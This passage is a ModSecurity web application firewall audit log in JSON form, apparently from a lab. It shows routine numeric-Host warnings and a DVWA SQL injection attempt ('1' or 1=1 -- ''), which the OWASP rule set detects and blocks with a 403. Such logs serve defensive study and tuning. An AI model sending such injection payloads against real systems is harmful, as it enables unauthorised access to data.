[level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdOwn8AAQEAABwOGokAAAAB\"]"],"stopwatch":{"p1":519,"p2":867,"p3":45,"p4":322,"p5":90,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGooAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdOwn8AAQEAABwOGooAAAAB\"]"],"stopwatch":{"p1":491,"p2":1031,"p3":46,"p4":252,"p5":49,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrkAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:59:06 GMT","If-None-Match":"\"ccc-54f6abd648acd-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRdTOH8AAQEAABwPUrkAAAAC\"]"],"stopwatch":{"p1":874,"p2":1421,"p3":71,"p4":437,"p5":224,"sr":68,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUroAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 18:21:50 GMT","If-None-Match":"\"295-54f6be54cc0d8\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:40:54 GMT","ETag":"\"295-54f6c29741bca\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdTOH8AAQEAABwPUroAAAAC\"]"],"stopwatch":{"p1":479,"p2":957,"p3":68,"p4":173,"p5":77,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrsAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdTOH8AAQEAABwPUrsAAAAC\"]"],"stopwatch":{"p1":391,"p2":972,"p3":49,"p4":254,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:40:56 --0400","transaction_id":"WRdTOH8AAQEAABwPUrwAAAAC","remote_address":"127.0.0.1","remote_port":43684,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRdTOH8AAQEAABwPUrwAAAAC\"]"],"stopwatch":{"p1":427,"p2":1041,"p3":76,"p4":264,"p5":49,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:36 --0400","transaction_id":"WRdUUH8AAQEAABwQSCgAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":920,"p2":3837,"p3":0,"p4":0,"p5":124,"sr":46,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:39 --0400","transaction_id":"WRdUU38AAQEAABwQSCkAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 